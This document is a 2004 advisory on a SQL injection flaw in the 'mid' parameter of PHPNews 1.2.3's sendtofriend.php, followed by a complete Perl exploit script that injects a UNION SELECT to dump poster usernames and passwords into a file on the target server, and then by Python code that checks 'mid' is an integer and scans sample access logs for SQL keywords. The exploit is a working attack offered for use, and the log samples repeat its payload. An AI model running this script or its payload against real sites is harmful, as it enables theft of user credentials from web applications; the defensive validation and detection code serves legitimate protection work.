SQL Injection vulnerability in PHPNews
11/25/2004

Description:

A vulnerability has been reported in PHPNews, which can be exploited by malicious people to conduct SQL injection attacks.

Input passed to the "mid" parameter in "sendtofriend.php" is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

The vulnerability has been reported in version 1.2.3. Other versions may also be affected.

Provided and/or discovered by:
Reported by vendor.

http://secunia.com/advisories/13300/

simple exploit-test written by ruggine <ruggine@autistici.org>
n.b. Use at your own risk! :P

--------------------------------- snip here
#!/usr/bin/perl -w
use Socket;

unless (@ARGV > 2) {
    die "usage: $0 mid_number /path_to_phpnews/ ip_host\n"
      . "f.e. phpnews 1 /phpnews/ 192.168.0.1\n";
}

my $mid_number       = $ARGV[0];
my $path_to_phpnews  = $ARGV[1];
my $host             = $ARGV[2];
my $port             = 80;
my $EOL              = "\015\012";

# URL-encoded string appended to the unsanitised "mid" parameter
my $inj = "%20union%20select%20username,password%20from%20phpnews_posters%20into%20outfile%20'/tmp/ghghgh'";

# raw HTTP/1.0 request for sendtofriend.php with the modified "mid" value
my $packet = "GET " . $path_to_phpnews . "sendtofriend.php?mid=" . $mid_number . $inj
           . " HTTP/1.0" . $EOL . $EOL;

my $protocol = getprotobyname('tcp');
my $iaddr    = inet_aton($host);
my $paddr    = sockaddr_in($port, $iaddr);

socket(SOCKET, PF_INET, SOCK_STREAM, $protocol) or die "no socket :-(";
connect(SOCKET, $paddr)                         or die "no connect :-(";
send(SOCKET, $packet, 0)                        or die "no send :-(";

# read and print the server's response
@lines = <SOCKET>;
print @lines;

close SOCKET or die "no close :-(";
-------------------------------------------end snip
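The fix the advisory implies is that "mid" must be accepted only as a plain integer before it reaches the query. As an added defender-side example (not part of the original advisory or of PHPNews), the following Python code applies that rule to a sendtofriend.php request and runs it over constructed access-log lines, one of which carries the URL-encoded UNION ... INTO OUTFILE shape shown above; the log format and IP addresses are assumptions.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic): one legitimate
# request, one carrying the URL-encoded payload shape from the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Nov/2004:10:00:01 +0000] "GET /phpnews/sendtofriend.php?mid=1 HTTP/1.0" 200 512
192.0.2.11 - - [25/Nov/2004:10:00:02 +0000] "GET /phpnews/sendtofriend.php?mid=1%20union%20select%20username,password%20from%20phpnews_posters%20into%20outfile%20'/tmp/x' HTTP/1.0" 200 77
192.0.2.12 - - [25/Nov/2004:10:00:03 +0000] "GET /phpnews/index.php HTTP/1.0" 200 2048
"""

# Common Log Format: client, identd, user, [time] "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# SQL keywords that can never legitimately appear inside a numeric id.
SQL_RE = re.compile(r"\b(union|select|into\s+outfile|load_file)\b", re.I)

def mid_is_valid(raw: str) -> bool:
    """The check sendtofriend.php should make before building its query: mid is a
    base-10 integer and nothing else. In PHP the same effect comes from an (int)
    cast or from binding mid as an integer parameter of a prepared statement."""
    return raw.isdigit()

def check_request(target: str) -> Optional[dict]:
    """Return a finding for a sendtofriend.php request whose mid is not a plain
    integer; None for clean or unrelated requests."""
    parts = urlsplit(target)
    if not parts.path.endswith("/sendtofriend.php"):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("mid", []):
        if mid_is_valid(value):
            continue
        m = SQL_RE.search(value)  # parse_qs has already %-decoded the value
        return {"mid": value, "keyword": m.group(1).lower() if m else None}
    return None

def scan_log(text: str) -> list:
    """Run check_request over every log line and attach the client address."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = check_request(m.group("target"))
        if hit:
            hit["client"] = m.group("client")
            findings.append(hit)
    return findings
```

Any request that fails mid_is_valid should be rejected by the application itself; the log scan is only for finding attempts after the fact.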